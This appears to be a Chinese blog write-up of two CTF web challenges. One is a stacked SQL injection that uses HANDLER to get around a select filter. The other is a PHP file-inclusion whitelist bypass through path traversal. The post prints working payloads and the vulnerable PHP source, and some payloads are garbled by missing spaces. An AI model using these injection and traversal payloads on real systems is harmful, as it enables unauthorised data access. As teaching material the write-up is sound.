综述由AI生成攻防世界 Web 安全挑战中的两个典型漏洞案例。第一题 Supersqli 展示了在 SQL 注入场景下,当常规关键字如 select 被过滤时,如何利用堆叠注入结合 handler 语句绕过限制获取 flag。第二题 Warmup 涉及 PHP 文件包含漏洞的代码审计,通过分析 checkFile 函数的白名单校验逻辑,利用 URL 编码及路径截断特性绕过检查,实现任意文件读取。文章总结了 SQL 注入绕过技巧与文件包含漏洞的防御思路。
打开如下所示,初步筛查这应该是一道 SQL 注入题。
这确实是一道 SQL 注入。
1' or 1=1 #
那接下来就是查询字段数。字段数为 2。
1' order by 2 #
查询数据库。正常的查询发现不行,被过滤了。
但是没有过滤分号那就可以堆叠注入联合 show。
1';show tables ;#
成功查询到一个特殊的表。
1';show columns from
1919810931114514;#
查询发现此表含 flag 但 select 被过滤如何查询 flag。
利用 handler 代替 select 查询。
payload: 1';handler
1919810931114514open asa;handleraread next;#
查询该表的数据。成功拿到 flag。
点开发现有提示 source.php。
访问 source.php 和 hint.php。
是一堆代码,进行代码审计。
访问 hint.php 提示我们 flag 在 ffffllllaaaagggg。
代码审计:
<?php highlight_file(__FILE__); //代码高亮
class emmm {
public static function checkFile(&$page) //checkFile 用于检查文件参数是否合法 &$page 表示通过引用传递参数,这样在函数内部对 $page 的修改会影响到函数外部的变量。
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"]; //定义一个白名单数组,里面包含允许包含的文件名(source.php 和 hint.php)
if (! isset($page) || !is_string($page)) { //第一个 if 功能为检查 $page 是否存在且为字符串类型如果不是则返回 false
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) { ///检查 $page 是否存在于白名单中存在则返回 true
return true;
}
$_page = mb_substr( //截取 $page 中?之前的部分存在$_page(mb_substr 是字符串截取函数,mb_strpos 是字符串查找函数)
$page, 0, mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) { //检查截取后$_page 是否在白名单中存在则返回 true
return true;
}
$_page = urldecode($page); //对$page 进行 url 解码
$_page = mb_substr( //截取?之前的部分存在$_page 中
$_page, 0, mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) { //检查解码并截取后的$_page 是否在白名单中存在则返回 true
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file'])) //也就是说只有过掉 checkFile 方法才可以包含文件
{
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
经过如上审计我们得知如果想要拿到 flag 就需过掉 checkfile 方法,那 checkfile 方法有四个 if 判断语句。
第一个判断语句就是判断我们传进去的是否为不为空且是字符串
第二个判断语句判断我们传的值是否在白名单中
第三个判断截取?之前部分后是否在白名单中
第四个判断语句判断对我们传的值 URL 解码截取后是否在白名单中
总得来说我们正常包含文件时/source.php?file=........
但是他第三年个和第四个判断语句只截取?之前的而 file 则被筛掉导致无法包含
所以只要我们变换一下顺序即可且第二个到第四个 if 判断只要有一个绕过即可。
Payload:?file=source.php?../../../../../../ffffllllaaaagggg (绕过第三个 if 判断)
Payload:/source.php?file=source.php?../../../../../../ffffllllaaaagggg(这样也可以)
成功拿到 flag。
SQL 注入漏洞,考察绕过过滤和堆叠注入技巧。
解题要点
select, update, delete 等; 进行堆叠注入prepare 和 execute 预处理语句绕过过滤handler 语句代替 select 进行数据读取关键 payload:
1';handler
1919810931114514open asa;handleraread first;#
学习收获
代码审计与文件包含漏洞。
解题要点
source.php../ 和 ..\ 的过滤checkFile 函数进行白名单检查../../../../ 绕过检查file=source.php?../../../../../ffffllllaaaagggg学习收获
综合对比
| 方面 | Supersqli | Warmup |
|---|---|---|
| 漏洞类型 | SQL 注入 | 文件包含 |
| 主要技巧 | 堆叠注入、预处理语句、handler 语法 | 目录遍历、白名单绕过 |
| 过滤机制 | 关键字过滤 | 路径符号过滤 |
| 解题关键 | 找到未被过滤的替代语法 | 构造足够深的目录结构绕过检查 |
| 难度等级 | 简单 | 简单 |
微信公众号「极客日志V2」,在微信中扫描左侧二维码关注。展示文案:极客日志V2 zeeklog
使用加密算法(如AES、TripleDES、Rabbit或RC4)加密和解密文本明文。 在线工具,加密/解密文本在线工具,online
基于开源反向 Alpha 混合算法去除 Gemini/Nano Banana 图片水印,支持批量处理与下载。 在线工具,Gemini 图片去水印在线工具,online
解析常见 curl 参数并生成 fetch、axios、PHP curl 或 Python requests 示例代码。 在线工具,curl 转代码在线工具,online
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML转Markdown 互为补充。 在线工具,Markdown转HTML在线工具,online